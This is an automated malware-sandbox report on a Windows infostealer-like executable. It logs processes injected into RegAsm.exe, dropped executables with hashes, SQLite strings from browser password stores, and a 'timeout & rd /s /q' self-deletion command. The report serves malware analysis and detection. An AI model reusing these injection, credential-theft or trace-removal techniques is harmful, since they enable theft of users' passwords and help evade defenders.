Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF24020	16_2_1FF24020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEF5030	16_2_1FEF5030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE93000	16_2_1FE93000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FED7010	16_2_1FED7010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFBD7C0	16_2_1FFBD7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE9BE60	16_2_1FE9BE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF6CC30	16_2_1FF6CC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEA39A0	16_2_1FEA39A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF085C0	16_2_1FF085C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEF9490	16_2_1FEF9490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEAD030	16_2_1FEAD030

Source: Joe Sandbox View	Dropped File: C:\ProgramData\FBFHJJJDAF.exe 7952E7769A991C349CC092B9CB3D1505405E793B526F49C784C343DD7D3CD227
Source: Joe Sandbox View	Dropped File: C:\ProgramData\FIEHIIIJDA.exe F75ACF936390F89239C43552717EFB65C4C3190B16A7EEC62DCD0053A045E91D
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C0BCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C0C94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CC80 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041D1E0 appears 164 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C2B09D0 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 36 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.2051620389.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exeD vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FBFHJJJDAF.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ljhgfsd[1].exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FIEHIIIJDA.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vdshfd[1].exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@29/35@14/10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_6C0E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

4_2_6C0E7030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

4_2_00411807

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\ProgramData\FIEHIIIJDA.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2820023276.000000006C2BF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2820023276.000000006C2BF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2820023276.000000006C2BF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2820023276.000000006C2BF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2820023276.000000006C2BF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2820023276.000000006C2BF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: RegAsm.exe, 00000010.00000002.3154731112.0000000001129000.00000004.00000020.00020000.00000000.sdmp, ECFHIJ.16.dr, AKJDGI.4.dr, GHJDBA.4.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\FBFHJJJDAF.exe "C:\ProgramData\FBFHJJJDAF.exe"
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\FIEHIIIJDA.exe "C:\ProgramData\FIEHIIIJDA.exe"
Source: C:\ProgramData\FIEHIIIJDA.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\FIEHIIIJDA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\FIEHIIIJDA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IIDHJDGCGDAA" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\FBFHJJJDAF.exe "C:\ProgramData\FBFHJJJDAF.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\FIEHIIIJDA.exe "C:\ProgramData\FIEHIIIJDA.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IIDHJDGCGDAA" & exit	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
